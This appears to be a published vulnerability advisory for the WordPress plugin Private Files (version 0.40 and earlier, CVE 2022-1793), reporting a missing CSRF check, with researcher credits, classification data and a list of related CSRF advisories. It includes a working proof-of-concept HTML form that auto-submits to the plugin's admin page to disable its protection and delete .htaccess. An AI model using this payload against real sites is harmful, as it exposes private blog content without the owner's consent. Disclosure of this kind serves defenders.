Private Files <= 0.40 – Protection Disabling via CSRF | CVE 2022-1793 | Plugin Vulnerabilities

Description

The plugin is missing CSRF check when disabling the protection, which could allow attackers to make a logged in admin perform such action via a CSRF attack and make the blog public

Proof of Concept

<form id="test" action="https://example.com/wp-admin/tools.php?page=privatefiles.php" method="POST">
    <input type="text" name="level" value="-1">
    <input type="text" name="unprotect" value="Unprotect">
    <input type="text" name="submit" value="true">
</form>
<script>
    document.getElementById("test").submit();
</script>

That will also delete the .htaccess

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

fd8b84b4-6944-4638-bdc1-1cb6aaabd42c

Timeline

Publicly Published

2022-05-23 (about 1 years ago)

Added

2022-05-23 (about 1 years ago)

Last Updated

2023-02-16 (about 1 years ago)

Other

Published

Title

Published

2023-04-03

Title

WPCode Lite < 2.0.9 - Arbitrary Log File Deletion via CSRF

Published

2024-01-10

Title

Voting Record <= 2.0 - Settings Update to Stored XSS via CSRF

Published

2023-03-29

Title

Wp Ultimate Review < 2.1.0 - Settings Update via CSRF

Published

2022-06-27

Title

Jquery Validation For Contact Form 7 < 5.3 - Arbitrary Options Update via CSRF

Published

2024-01-31

Title

WP-CFM < 1.7.9 - Cross-Site Request Forgery via multiple AJAX functions